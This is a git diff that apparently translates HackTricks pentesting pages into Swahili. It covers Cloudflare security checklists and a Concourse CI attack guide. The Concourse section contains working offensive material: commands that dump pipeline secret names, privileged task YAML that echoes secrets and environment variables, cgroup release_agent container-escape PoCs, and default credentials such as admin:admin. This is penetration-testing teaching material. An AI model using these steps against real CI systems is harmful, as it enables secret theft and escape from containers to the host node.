@@ -85,15 +85,15 @@ cloudflare-zero-trust-network.md
### Speed
-_I couldn't find any option related to security_
+_Sikuweza kupata chaguo lolote linalohusiana na usalama_
### Caching
-- [ ] In the **`Configuration`** section consider enabling the **CSAM Scanning Tool**
+- [ ] Katika sehemu ya **`Configuration`** fikiria kuwezesha **CSAM Scanning Tool**
### **Workers Routes**
-_You should have already checked_ [_cloudflare workers_](./#workers)
+_Unapaswa kuwa umeshakagua_ [_cloudflare workers_](./#workers)
### Rules
@@ -101,9 +101,9 @@ TODO
### Network
-- [ ] If **`HTTP/2`** is **enabled**, **`HTTP/2 to Origin`** should be **enabled**
-- [ ] **`HTTP/3 (with QUIC)`** should be **enabled**
-- [ ] If the **privacy** of your **users** is important, make sure **`Onion Routing`** is **enabled**
+- [ ] Ikiwa **`HTTP/2`** ime **wezeshwa**, **`HTTP/2 to Origin`** inapaswa kuwa **imewezeshwa**
+- [ ] **`HTTP/3 (with QUIC)`** inapaswa kuwa **imewezeshwa**
+- [ ] Ikiwa **faragha** ya **watumiaji** wako ni muhimu, hakikisha **`Onion Routing`** ime **wezeshwa**
### **Traffic**
@@ -111,7 +111,7 @@ TODO
### Custom Pages
-- [ ] It's optional to configure custom pages when an error related to security is triggered (like a block, rate limiting or I'm under attack mode)
+- [ ] Ni hiari kuweka kurasa maalum wakati kosa linalohusiana na usalama linapotokea (kama kizuizi, rate limiting au niko chini ya shambulio)
### Apps
@@ -119,8 +119,8 @@ TODO
### Scrape Shield
-- [ ] Check **Email Address Obfuscation** is **enabled**
-- [ ] Check **Server-side Excludes** is **enabled**
+- [ ] Angalia **Email Address Obfuscation** ime **wezeshwa**
+- [ ] Angalia **Server-side Excludes** ime **wezeshwa**
### **Zaraz**
@@ -131,7 +131,3 @@ TODO
TODO
{{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.md b/src/pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.md
index 491ae7bc1..bc2e39982 100644
--- a/src/pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.md
+++ b/src/pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.md
@@ -2,43 +2,43 @@
{{#include ../../banners/hacktricks-training.md}}
-In a **Cloudflare Zero Trust Network** account there are some **settings and services** that can be configured. In this page we are going to **analyze the security related settings of each section:**
+Katika akaunti ya **Cloudflare Zero Trust Network** kuna **mipangilio na huduma** ambazo zinaweza kuwekewa mipangilio. Katika ukurasa huu tutachambua **mipangilio inayohusiana na usalama ya kila sehemu:**
### Analytics
-- [ ] Useful to **get to know the environment**
+- [ ] Inasaidia **kujua mazingira**
### **Gateway**
-- [ ] In **`Policies`** it's possible to generate policies to **restrict** by **DNS**, **network** or **HTTP** request who can access applications.
- - If used, **policies** could be created to **restrict** the access to malicious sites.
- - This is **only relevant if a gateway is being used**, if not, there is no reason to create defensive policies.
+- [ ] Katika **`Policies`** inawezekana kuunda sera za **kuzuia** kwa **DNS**, **mtandao** au **HTTP** ombi nani anaweza kufikia programu.
+- Ikiwa inatumika, **sera** zinaweza kuundwa ili **kuzuia** ufikiaji wa tovuti za uhalifu.
+- Hii ni **muhimu tu ikiwa gateway inatumika**, ikiwa sivyo, hakuna sababu ya kuunda sera za kujihami.
### Access
#### Applications
-On each application:
+Katika kila programu:
-- [ ] Check **who** can access to the application in the **Policies** and check that **only** the **users** that **need access** to the application can access.
- - To allow access **`Access Groups`** are going to be used (and **additional rules** can be set also)
-- [ ] Check the **available identity providers** and make sure they **aren't too open**
-- [ ] In **`Settings`**:
- - [ ] Check **CORS isn't enabled** (if it's enabled, check it's **secure** and it isn't allowing everything)
- - [ ] Cookies should have **Strict Same-Site** attribute, **HTTP Only** and **binding cookie** should be **enabled** if the application is HTTP.
- - [ ] Consider enabling also **Browser rendering** for better **protection. More info about** [**remote browser isolation here**](https://blog.cloudflare.com/cloudflare-and-remote-browser-isolation/)**.**
+- [ ] Angalia **nani** anaweza kufikia programu katika **Policies** na hakikisha kwamba **tu** **watumiaji** ambao **wanahitaji ufikiaji** wa programu wanaweza kufikia.
+- Ili kuruhusu ufikiaji, **`Access Groups`** zitatumika (na **kanuni za ziada** zinaweza kuwekwa pia)
+- [ ] Angalia **watoa huduma za utambulisho** waliopo na hakikisha hawako **wazi sana**
+- [ ] Katika **`Settings`**:
+- [ ] Angalia **CORS haijawashwa** (ikiwa imewashwa, angalia ni **salama** na hairuhusu kila kitu)
+- [ ] Cookies zinapaswa kuwa na sifa ya **Strict Same-Site**, **HTTP Only** na **binding cookie** inapaswa kuwa **imewashwa** ikiwa programu ni HTTP.
+- [ ] Fikiria pia kuwezesha **Browser rendering** kwa ulinzi bora. Maelezo zaidi kuhusu [**remote browser isolation hapa**](https://blog.cloudflare.com/cloudflare-and-remote-browser-isolation/)**.**
#### **Access Groups**
-- [ ] Check that the access groups generated are **correctly restricted** to the users they should allow.
-- [ ] It's specially important to check that the **default access group isn't very open** (it's **not allowing too many people**) as by **default** anyone in that **group** is going to be able to **access applications**.
- - Note that it's possible to give **access** to **EVERYONE** and other **very open policies** that aren't recommended unless 100% necessary.
+- [ ] Angalia kwamba vikundi vya ufikiaji vilivyoundwa vime **kuzuia kwa usahihi** kwa watumiaji wanapaswa kuruhusu.
+- [ ] Ni muhimu hasa kuangalia kwamba **kikundi cha ufikiaji cha kawaida hakiko wazi sana** (hakiruhusu watu wengi sana) kwani kwa **kawaida** mtu yeyote katika **kikundi** hicho atakuwa na uwezo wa **kufikia programu**.
+- Kumbuka kwamba inawezekana kutoa **ufikiaji** kwa **KILA MTU** na sera nyingine **wazi sana** ambazo hazipendekezwi isipokuwa ni muhimu 100%.
#### Service Auth
-- [ ] Check that all service tokens **expires in 1 year or less**
+- [ ] Angalia kwamba tokeni zote za huduma **zinakoma katika mwaka 1 au chini**
#### Tunnels
@@ -50,16 +50,12 @@ TODO
### Logs
-- [ ] You could search for **unexpected actions** from users
+- [ ] Unaweza kutafuta **vitendo visivyotarajiwa** kutoka kwa watumiaji
### Settings
-- [ ] Check the **plan type**
-- [ ] It's possible to see the **credits card owner name**, **last 4 digits**, **expiration** date and **address**
-- [ ] It's recommended to **add a User Seat Expiration** to remove users that doesn't really use this service
+- [ ] Angalia **aina ya mpango**
+- [ ] Inawezekana kuona **jina la mmiliki wa kadi ya mkopo**, **nambari 4 za mwisho**, tarehe ya **kuisha** na **anwani**
+- [ ] Inapendekezwa **kuongeza Uthibitisho wa Kiti cha Mtumiaji** ili kuondoa watumiaji ambao hawatumii huduma hii kwa kweli
{{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/concourse-security/README.md b/src/pentesting-ci-cd/concourse-security/README.md
index bcf20facf..1a951d396 100644
--- a/src/pentesting-ci-cd/concourse-security/README.md
+++ b/src/pentesting-ci-cd/concourse-security/README.md
@@ -1,37 +1,33 @@
-# Concourse Security
+# Usalama wa Concourse
{{#include ../../banners/hacktricks-training.md}}
-## Basic Information
+## Taarifa za Msingi
-Concourse allows you to **build pipelines** to automatically run tests, actions and build images whenever you need it (time based, when something happens...)
+Concourse inakuwezesha **kujenga mipango** ili kiotomatiki kufanikisha majaribio, vitendo na kujenga picha kila wakati unavyohitaji (kulingana na muda, wakati kitu kinapotokea...)
-## Concourse Architecture
+## Muktadha wa Concourse
-Learn how the concourse environment is structured in:
+Jifunze jinsi mazingira ya concourse yalivyojengwa katika:
{{#ref}}
-concourse-architecture.md
+muktadha-wa-concourse.md
{{#endref}}
-## Concourse Lab
+## Maabara ya Concourse
-Learn how you can run a concourse environment locally to do your own tests in:
+Jifunze jinsi unavyoweza kuendesha mazingira ya concourse kwa ndani ili kufanya majaribio yako mwenyewe katika:
{{#ref}}
-concourse-lab-creation.md
+uundaji-wa-maabara-ya-concourse.md
{{#endref}}
-## Enumerate & Attack Concourse
+## Kuorodhesha & Kushambulia Concourse
-Learn how you can enumerate the concourse environment and abuse it in:
+Jifunze jinsi unavyoweza kuorodhesha mazingira ya concourse na kuyatumia vibaya katika:
{{#ref}}
-concourse-enumeration-and-attacks.md
+kuorodhesha-na-kushambulia-concourse.md
{{#endref}}
{{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/concourse-security/concourse-architecture.md b/src/pentesting-ci-cd/concourse-security/concourse-architecture.md
index d70167906..4214c1d7a 100644
--- a/src/pentesting-ci-cd/concourse-security/concourse-architecture.md
+++ b/src/pentesting-ci-cd/concourse-security/concourse-architecture.md
@@ -12,31 +12,27 @@
#### ATC: web UI & build scheduler
-The ATC is the heart of Concourse. It runs the **web UI and API** and is responsible for all pipeline **scheduling**. It **connects to PostgreSQL**, which it uses to store pipeline data (including build logs).
+ATC ni moyo wa Concourse. Inafanya kazi ya **web UI na API** na ina jukumu la **kusimamia** mipango yote ya pipeline. In **unganishwa na PostgreSQL**, ambayo inatumika kuhifadhi data za pipeline (ikiwemo kumbukumbu za ujenzi).
-The [checker](https://concourse-ci.org/checker.html)'s responsibility is to continuously checks for new versions of resources. The [scheduler](https://concourse-ci.org/scheduler.html) is responsible for scheduling builds for a job and the [build tracker](https://concourse-ci.org/build-tracker.html) is responsible for running any scheduled builds. The [garbage collector](https://concourse-ci.org/garbage-collector.html) is the cleanup mechanism for removing any unused or outdated objects, such as containers and volumes.
+Jukumu la [checker](https://concourse-ci.org/checker.html) ni kuangalia kwa muda wote toleo jipya la rasilimali. [scheduler](https://concourse-ci.org/scheduler.html) ina jukumu la kupanga ujenzi kwa kazi na [build tracker](https://concourse-ci.org/build-tracker.html) ina jukumu la kuendesha ujenzi wowote uliopangwa. [garbage collector](https://concourse-ci.org/garbage-collector.html) ni mekanizma ya kusafisha kwa kuondoa vitu vyovyote visivyotumika au vya zamani, kama vile kontena na volumes.
#### TSA: worker registration & forwarding
-The TSA is a **custom-built SSH server** that is used solely for securely **registering** [**workers**](https://concourse-ci.org/internals.html#architecture-worker) with the [ATC](https://concourse-ci.org/internals.html#component-atc).
+TSA ni **seva ya SSH iliyojengwa maalum** ambayo inatumika pekee kwa **kujiandikisha** [**workers**](https://concourse-ci.org/internals.html#architecture-worker) kwa [ATC](https://concourse-ci.org/internals.html#component-atc).
-The TSA by **default listens on port `2222`**, and is usually colocated with the [ATC](https://concourse-ci.org/internals.html#component-atc) and sitting behind a load balancer.
+TSA kwa **kawaida inasikiliza kwenye bandari `2222`**, na mara nyingi iko pamoja na [ATC](https://concourse-ci.org/internals.html#component-atc) na iko nyuma ya balancer ya mzigo.
-The **TSA implements CLI over the SSH connection,** supporting [**these commands**](https://concourse-ci.org/internals.html#component-tsa).
+**TSA inatekeleza CLI kupitia muunganisho wa SSH,** ikisaidia [**amri hizi**](https://concourse-ci.org/internals.html#component-tsa).
#### Workers
-In order to execute tasks concourse must have some workers. These workers **register themselves** via the [TSA](https://concourse-ci.org/internals.html#component-tsa) and run the services [**Garden**](https://github.com/cloudfoundry-incubator/garden) and [**Baggageclaim**](https://github.com/concourse/baggageclaim).
+Ili kutekeleza kazi, concourse lazima iwe na baadhi ya wafanyakazi. Wafanyakazi hawa **jiandikishe** kupitia [TSA](https://concourse-ci.org/internals.html#component-tsa) na kuendesha huduma [**Garden**](https://github.com/cloudfoundry-incubator/garden) na [**Baggageclaim**](https://github.com/concourse/baggageclaim).
-- **Garden**: This is the **Container Manage AP**I, usually run in **port 7777** via **HTTP**.
-- **Baggageclaim**: This is the **Volume Management API**, usually run in **port 7788** via **HTTP**.
+- **Garden**: Hii ni **Container Manage API**, mara nyingi inafanya kazi kwenye **bandari 7777** kupitia **HTTP**.
+- **Baggageclaim**: Hii ni **Volume Management API**, mara nyingi inafanya kazi kwenye **bandari 7788** kupitia **HTTP**.
## References
- [https://concourse-ci.org/internals.html](https://concourse-ci.org/internals.html)
{{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.md b/src/pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.md
index 4b778a804..157d66194 100644
--- a/src/pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.md
+++ b/src/pentesting-ci-cd/concourse-security/concourse-enumeration-and-attacks.md
@@ -6,36 +6,34 @@
### User Roles & Permissions
-Concourse comes with five roles:
+Concourse inakuja na majukumu matano:
-- _Concourse_ **Admin**: This role is only given to owners of the **main team** (default initial concourse team). Admins can **configure other teams** (e.g.: `fly set-team`, `fly destroy-team`...). The permissions of this role cannot be affected by RBAC.
-- **owner**: Team owners can **modify everything within the team**.
-- **member**: Team members can **read and write** within the **teams assets** but cannot modify the team settings.
-- **pipeline-operator**: Pipeline operators can perform **pipeline operations** such as triggering builds and pinning resources, however they cannot update pipeline configurations.
-- **viewer**: Team viewers have **"read-only" access to a team** and its pipelines.
+- _Concourse_ **Admin**: Hii jukumu inatolewa tu kwa wamiliki wa **timu kuu** (timu ya mwanzo ya concourse). Wasimamizi wanaweza **kuunda timu nyingine** (mfano: `fly set-team`, `fly destroy-team`...). Ruhusa za jukumu hili haziwezi kuathiriwa na RBAC.
+- **mwenye**: Wamiliki wa timu wanaweza **kubadilisha kila kitu ndani ya timu**.
+- **mwanachama**: Wanachama wa timu wanaweza **kusoma na kuandika** ndani ya **rasilimali za timu** lakini hawawezi kubadilisha mipangilio ya timu.
+- **mpangaji-mchakato**: Wapangaji-mchakato wanaweza kufanya **operesheni za mchakato** kama vile kuanzisha ujenzi na kuweka rasilimali, hata hivyo hawawezi kubadilisha mipangilio ya mchakato.
+- **mtazamaji**: Watazamaji wa timu wana **"ufikiaji wa kusoma tu" kwa timu** na mchakato zake.
> [!NOTE]
-> Moreover, the **permissions of the roles owner, member, pipeline-operator and viewer can be modified** configuring RBAC (configuring more specifically it's actions). Read more about it in: [https://concourse-ci.org/user-roles.html](https://concourse-ci.org/user-roles.html)
+> Zaidi ya hayo, **ruhusa za majukumu ya mwenye, mwanachama, mpangaji-mchakato na mtazamaji zinaweza kubadilishwa** kwa kuunda RBAC (kuunda kwa usahihi vitendo vyake). Soma zaidi kuhusu hilo katika: [https://concourse-ci.org/user-roles.html](https://concourse-ci.org/user-roles.html)
-Note that Concourse **groups pipelines inside Teams**. Therefore users belonging to a Team will be able to manage those pipelines and **several Teams** might exist. A user can belong to several Teams and have different permissions inside each of them.
+Kumbuka kwamba Concourse **inaunganisha mchakato ndani ya Timu**. Hivyo basi watumiaji wanaotokana na Timu wataweza kusimamia mchakato hizo na **Timu kadhaa** zinaweza kuwepo. Mtumiaji anaweza kuwa sehemu ya Timu kadhaa na kuwa na ruhusa tofauti ndani ya kila moja yao.
### Vars & Credential Manager
-In the YAML configs you can configure values using the syntax `((_source-name_:_secret-path_._secret-field_))`.\
-[From the docs:](https://concourse-ci.org/vars.html#var-syntax) The **source-name is optional**, and if omitted, the [cluster-wide credential manager](https://concourse-ci.org/vars.html#cluster-wide-credential-manager) will be used, or the value may be provided [statically](https://concourse-ci.org/vars.html#static-vars).\
-The **optional \_secret-field**\_ specifies a field on the fetched secret to read. If omitted, the credential manager may choose to read a 'default field' from the fetched credential if the field exists.\
-Moreover, the _**secret-path**_ and _**secret-field**_ may be surrounded by double quotes `"..."` if they **contain special characters** like `.` and `:`. For instance, `((source:"my.secret"."field:1"))` will set the _secret-path_ to `my.secret` and the _secret-field_ to `field:1`.
+Katika mipangilio ya YAML unaweza kuunda thamani ukitumia sintaksia `((_source-name_:_secret-path_._secret-field_))`.\
+[Kutoka kwenye hati:](https://concourse-ci.org/vars.html#var-syntax) **source-name ni hiari**, na ikiwa imeachwa, [meneja wa akiba wa kiwango cha klasta](https://concourse-ci.org/vars.html#cluster-wide-credential-manager) atatumika, au thamani inaweza kutolewa [kwa statiki](https://concourse-ci.org/vars.html#static-vars).\
+**_secret-field_** ya hiari inabainisha uwanja kwenye akiba iliyopatikana kusoma. Ikiwa imeachwa, meneja wa akiba anaweza kuchagua kusoma 'uwanja wa kawaida' kutoka kwa akiba iliyopatikana ikiwa uwanja huo upo.\
+Zaidi ya hayo, _**secret-path**_ na _**secret-field**_ zinaweza kuzungukwa na nukuu mbili `"..."` ikiwa zina **micharacters maalum** kama `.` na `:`. Kwa mfano, `((source:"my.secret"."field:1"))` itaweka _secret-path_ kuwa `my.secret` na _secret-field_ kuwa `field:1`.
#### Static Vars
-Static vars can be specified in **tasks steps**:
-
+Static vars zinaweza kubainishwa katika **hatua za kazi**:
```yaml
- task: unit-1.13
- file: booklit/ci/unit.yml
- vars: { tag: 1.13 }
+file: booklit/ci/unit.yml
+vars: { tag: 1.13 }
```
-
Or using the following `fly` **arguments**:
- `-v` or `--var` `NAME=VALUE` sets the string `VALUE` as the value for the var `NAME`.
@@ -43,82 +41,80 @@ Or using the following `fly` **arguments**:
- `-i` or `--instance-var` `NAME=VALUE` parses `VALUE` as YAML and sets it as the value for the instance var `NAME`. See [Grouping Pipelines](https://concourse-ci.org/instanced-pipelines.html) to learn more about instance vars.
- `-l` or `--load-vars-from` `FILE` loads `FILE`, a YAML document containing mapping var names to values, and sets them all.
-#### Credential Management
+#### Usimamizi wa Akida
-There are different ways a **Credential Manager can be specified** in a pipeline, read how in [https://concourse-ci.org/creds.html](https://concourse-ci.org/creds.html).\
-Moreover, Concourse supports different credential managers:
+Kuna njia tofauti ambazo **Msimamizi wa Akida unaweza kufafanuliwa** katika pipeline, soma jinsi katika [https://concourse-ci.org/creds.html](https://concourse-ci.org/creds.html).\
+Zaidi ya hayo, Concourse inasaidia wasimamizi wa akida tofauti:
-- [The Vault credential manager](https://concourse-ci.org/vault-credential-manager.html)
-- [The CredHub credential manager](https://concourse-ci.org/credhub-credential-manager.html)
-- [The AWS SSM credential manager](https://concourse-ci.org/aws-ssm-credential-manager.html)
-- [The AWS Secrets Manager credential manager](https://concourse-ci.org/aws-asm-credential-manager.html)
-- [Kubernetes Credential Manager](https://concourse-ci.org/kubernetes-credential-manager.html)
-- [The Conjur credential manager](https://concourse-ci.org/conjur-credential-manager.html)
-- [Caching credentials](https://concourse-ci.org/creds-caching.html)
-- [Redacting credentials](https://concourse-ci.org/creds-redacting.html)
-- [Retrying failed fetches](https://concourse-ci.org/creds-retry-logic.html)
+- [Msimamizi wa akida wa Vault](https://concourse-ci.org/vault-credential-manager.html)
+- [Msimamizi wa akida wa CredHub](https://concourse-ci.org/credhub-credential-manager.html)
+- [Msimamizi wa akida wa AWS SSM](https://concourse-ci.org/aws-ssm-credential-manager.html)
+- [Msimamizi wa akida wa AWS Secrets Manager](https://concourse-ci.org/aws-asm-credential-manager.html)
+- [Msimamizi wa Akida wa Kubernetes](https://concourse-ci.org/kubernetes-credential-manager.html)
+- [Msimamizi wa akida wa Conjur](https://concourse-ci.org/conjur-credential-manager.html)
+- [Kuhifadhi akida](https://concourse-ci.org/creds-caching.html)
+- [Kuficha akida](https://concourse-ci.org/creds-redacting.html)
+- [Kujaribu tena kufikia zilizoshindwa](https://concourse-ci.org/creds-retry-logic.html)
> [!CAUTION]
-> Note that if you have some kind of **write access to Concourse** you can create jobs to **exfiltrate those secrets** as Concourse needs to be able to access them.
+> Kumbuka kwamba ikiwa una aina fulani ya **ufikiaji wa kuandika kwa Concourse** unaweza kuunda kazi za **kuondoa siri hizo** kwani Concourse inahitaji kuwa na uwezo wa kuzifikia.
-### Concourse Enumeration
+### Uhesabuji wa Concourse
-In order to enumerate a concourse environment you first need to **gather valid credentials** or to find an **authenticated token** probably in a `.flyrc` config file.
+Ili kuhesabu mazingira ya concourse unahitaji kwanza **kusanya akida halali** au kupata **token iliyothibitishwa** labda katika faili ya usanidi `.flyrc`.
-#### Login and Current User enum
+#### Ingia na Ujumbe wa Sasa
-- To login you need to know the **endpoint**, the **team name** (default is `main`) and a **team the user belongs to**:
- - `fly --target example login --team-name my-team --concourse-url https://ci.example.com [--insecure] [--client-cert=./path --client-key=./path]`
-- Get configured **targets**:
- - `fly targets`
-- Get if the configured **target connection** is still **valid**:
- - `fly -t status`
-- Get **role** of the user against the indicated target:
- - `fly -t userinfo`
+- Ili kuingia unahitaji kujua **kiungo**, **jina la timu** (kawaida ni `main`) na **timu ambayo mtumiaji anahusishwa nayo**:
+- `fly --target example login --team-name my-team --concourse-url https://ci.example.com [--insecure] [--client-cert=./path --client-key=./path]`
+- Pata **malengo** yaliyowekwa:
+- `fly targets`
+- Pata ikiwa **kiungo kilichowekwa** bado ni **halali**:
+- `fly -t status`
+- Pata **jukumu** la mtumiaji dhidi ya lengo lililoonyeshwa:
+- `fly -t userinfo`
> [!NOTE]
-> Note that the **API token** is **saved** in `$HOME/.flyrc` by default, you looting a machines you could find there the credentials.
+> Kumbuka kwamba **token ya API** inahifadhiwa katika `$HOME/.flyrc` kwa kawaida, unapoiba mashine unaweza kuipata huko akida.
-#### Teams & Users
+#### Timu & Watumiaji
-- Get a list of the Teams
- - `fly -t teams`
-- Get roles inside team
- - `fly -t get-team -n `
-- Get a list of users
- - `fly -t active-users`
+- Pata orodha ya Timu
+- `fly -t teams`
+- Pata majukumu ndani ya timu
+- `fly -t get-team -n `
+- Pata orodha ya watumiaji
+- `fly -t active-users`
#### Pipelines
-- **List** pipelines:
- - `fly -t pipelines -a`
-- **Get** pipeline yaml (**sensitive information** might be found in the definition):
- - `fly -t get-pipeline -p `
-- Get all pipeline **config declared vars**
- - `for pipename in $(fly -t pipelines | grep -Ev "^id" | awk '{print $2}'); do echo $pipename; fly -t get-pipeline -p $pipename -j | grep -Eo '"vars":[^}]+'; done`
-- Get all the **pipelines secret names used** (if you can create/modify a job or hijack a container you could exfiltrate them):
-
+- **Orodha** ya pipelines:
+- `fly -t pipelines -a`
+- **Pata** yaml ya pipeline (**taarifa nyeti** zinaweza kupatikana katika ufafanuzi):
+- `fly -t get-pipeline -p `
+- Pata **mipangilio yote ya pipeline iliyotangazwa**
+- `for pipename in $(fly -t pipelines | grep -Ev "^id" | awk '{print $2}'); do echo $pipename; fly -t get-pipeline -p $pipename -j | grep -Eo '"vars":[^}]+'; done`
+- Pata majina yote ya **siri za pipelines zilizotumika** (ikiwa unaweza kuunda/kubadilisha kazi au kuiba kontena unaweza kuondoa hizo):
```bash
rm /tmp/secrets.txt;
for pipename in $(fly -t onelogin pipelines | grep -Ev "^id" | awk '{print $2}'); do
- echo $pipename;
- fly -t onelogin get-pipeline -p $pipename | grep -Eo '\(\(.*\)\)' | sort | uniq | tee -a /tmp/secrets.txt;
- echo "";
+echo $pipename;
+fly -t onelogin get-pipeline -p $pipename | grep -Eo '\(\(.*\)\)' | sort | uniq | tee -a /tmp/secrets.txt;
+echo "";
done
echo ""
echo "ALL SECRETS"
cat /tmp/secrets.txt | sort | uniq
rm /tmp/secrets.txt
```
-
#### Containers & Workers
-- List **workers**:
- - `fly -t workers`
-- List **containers**:
- - `fly -t containers`
-- List **builds** (to see what is running):
- - `fly -t builds`
+- Orodha **workers**:
+- `fly -t workers`
+- Orodha **containers**:
+- `fly -t containers`
+- Orodha **builds** (kuona kinachoendelea):
+- `fly -t builds`
### Concourse Attacks
@@ -127,92 +123,85 @@ rm /tmp/secrets.txt
- admin:admin
- test:test
-#### Secrets and params enumeration
+#### Usanidi wa siri na params
-In the previous section we saw how you can **get all the secrets names and vars** used by the pipeline. The **vars might contain sensitive info** and the name of the **secrets will be useful later to try to steal** them.
+Katika sehemu iliyopita tuliona jinsi unavyoweza **kupata majina yote ya siri na vars** zinazotumiwa na pipeline. **Vars zinaweza kuwa na taarifa nyeti** na jina la **siri litakuwa muhimu baadaye kujaribu kuiba** hizo.
-#### Session inside running or recently run container
-
-If you have enough privileges (**member role or more**) you will be able to **list pipelines and roles** and just get a **session inside** the `/` **container** using:
+#### Kikao ndani ya container inayokimbia au iliyokimbia hivi karibuni
+Ikiwa una ruhusa za kutosha (**mwanachama au zaidi**) utaweza **kuorodhesha pipelines na roles** na tu kupata **kikao ndani** ya `/` **container** kwa kutumia:
```bash
fly -t tutorial intercept --job pipeline-name/job-name
fly -t tutorial intercept # To be presented a prompt with all the options
```
+Kwa ruhusa hizi unaweza kuwa na uwezo wa:
-With these permissions you might be able to:
+- **Kuchukua siri** ndani ya **konteina**
+- Jaribu **kutoroka** hadi kwenye node
+- Kuorodhesha/Kutumia vibaya **cloud metadata** endpoint (kutoka kwenye pod na kutoka kwenye node, ikiwa inawezekana)
-- **Steal the secrets** inside the **container**
-- Try to **escape** to the node
-- Enumerate/Abuse **cloud metadata** endpoint (from the pod and from the node, if possible)
-
-#### Pipeline Creation/Modification
-
-If you have enough privileges (**member role or more**) you will be able to **create/modify new pipelines.** Check this example:
+#### Uundaji/Modification wa Pipeline
+Ikiwa una ruhusa za kutosha (**mwanachama au zaidi**) utaweza **kuunda/kubadilisha pipelines mpya.** Angalia mfano huu:
```yaml
jobs:
- - name: simple
- plan:
- - task: simple-task
- privileged: true
- config:
- # Tells Concourse which type of worker this task should run on
- platform: linux
- image_resource:
- type: registry-image
- source:
- repository: busybox # images are pulled from docker hub by default
- run:
- path: sh
- args:
- - -cx
- - |
- echo "$SUPER_SECRET"
- sleep 1000
- params:
- SUPER_SECRET: ((super.secret))
+- name: simple
+plan:
+- task: simple-task
+privileged: true
+config:
+# Tells Concourse which type of worker this task should run on
+platform: linux
+image_resource:
+type: registry-image
+source:
+repository: busybox # images are pulled from docker hub by default
+run:
+path: sh
+args:
+- -cx
+- |
+echo "$SUPER_SECRET"
+sleep 1000
+params:
+SUPER_SECRET: ((super.secret))
```
+Kwa **mabadiliko/kuunda** pipeline mpya utaweza:
-With the **modification/creation** of a new pipeline you will be able to:
+- **Kuhujumu** **siri** (kupitia kuzionyesha au kuingia ndani ya kontena na kuendesha `env`)
+- **Kutoroka** hadi **node** (kwa kukupa ruhusa za kutosha - `privileged: true`)
+- Kuorodhesha/Kutumia **cloud metadata** endpoint (kutoka kwenye pod na kutoka kwenye node)
+- **Futa** pipeline iliyoundwa
-- **Steal** the **secrets** (via echoing them out or getting inside the container and running `env`)
-- **Escape** to the **node** (by giving you enough privileges - `privileged: true`)
-- Enumerate/Abuse **cloud metadata** endpoint (from the pod and from the node)
-- **Delete** created pipeline
-
-#### Execute Custom Task
-
-This is similar to the previous method but instead of modifying/creating a whole new pipeline you can **just execute a custom task** (which will probably be much more **stealthier**):
+#### Teua Kazi Maalum
+Hii ni sawa na njia ya awali lakini badala ya kubadilisha/kuunda pipeline mpya kabisa unaweza **tu kutekeleza kazi maalum** (ambayo labda itakuwa **siri zaidi**):
```yaml
# For more task_config options check https://concourse-ci.org/tasks.html
platform: linux
image_resource:
- type: registry-image
- source:
- repository: ubuntu
+type: registry-image
+source:
+repository: ubuntu
run:
- path: sh
- args:
- - -cx
- - |
- env
- sleep 1000
+path: sh
+args:
+- -cx
+- |
+env
+sleep 1000
params:
- SUPER_SECRET: ((super.secret))
+SUPER_SECRET: ((super.secret))
```
```bash
fly -t tutorial execute --privileged --config task_config.yml
```
+#### Kutoroka kwenye node kutoka kwa kazi yenye mamlaka
-#### Escaping to the node from privileged task
-
-In the previous sections we saw how to **execute a privileged task with concourse**. This won't give the container exactly the same access as the privileged flag in a docker container. For example, you won't see the node filesystem device in /dev, so the escape could be more "complex".
-
-In the following PoC we are going to use the release_agent to escape with some small modifications:
+Katika sehemu zilizopita tuliona jinsi ya **kutekeleza kazi yenye mamlaka na concourse**. Hii haitatoa ufikiaji sawa kabisa na bendera yenye mamlaka katika kontena la docker. Kwa mfano, huwezi kuona kifaa cha mfumo wa faili cha node katika /dev, hivyo kutoroka kunaweza kuwa "ngumu" zaidi.
+Katika PoC ifuatayo tutatumia release_agent kutoroka na marekebisho madogo:
```bash
# Mounts the RDMA cgroup controller and create a child cgroup
# If you're following along and get "mount: /tmp/cgrp: special device cgroup does not exist"
@@ -270,14 +259,12 @@ sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
# Reads the output
cat /output
```
-
> [!WARNING]
-> As you might have noticed this is just a [**regular release_agent escape**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/concourse-security/broken-reference/README.md) just modifying the path of the cmd in the node
+> Kama unavyojua hii ni tu [**kutoroka kwa release_agent wa kawaida**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/concourse-security/broken-reference/README.md) tu kubadilisha njia ya cmd katika node
-#### Escaping to the node from a Worker container
-
-A regular release_agent escape with a minor modification is enough for this:
+#### Kutoroka hadi node kutoka kwa kontena la Worker
+Kutoroka kwa release_agent wa kawaida na mabadiliko madogo yanatosha kwa hili:
```bash
mkdir /tmp/cgrp && mount -t cgroup -o memory cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
@@ -304,13 +291,11 @@ sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
# Reads the output
cat /output
```
+#### Kutoroka kwenye node kutoka kwenye Web container
-#### Escaping to the node from the Web container
-
-Even if the web container has some defenses disabled it's **not running as a common privileged container** (for example, you **cannot** **mount** and the **capabilities** are very **limited**, so all the easy ways to escape from the container are useless).
-
-However, it stores **local credentials in clear text**:
+Hata kama web container ina baadhi ya ulinzi zilizozuiliwa **haifanyi kazi kama container yenye mamlaka ya kawaida** (kwa mfano, huwezi **kuunganisha** na **uwezo** ni **mdogo sana**, hivyo njia zote rahisi za kutoroka kutoka kwenye container hazifai).
+Hata hivyo, inahifadhi **akili za ndani kwa maandiko wazi**:
```bash
cat /concourse-auth/local-users
test:test
@@ -319,11 +304,9 @@ env | grep -i local_user
CONCOURSE_MAIN_TEAM_LOCAL_USER=test
CONCOURSE_ADD_LOCAL_USER=test:test
```
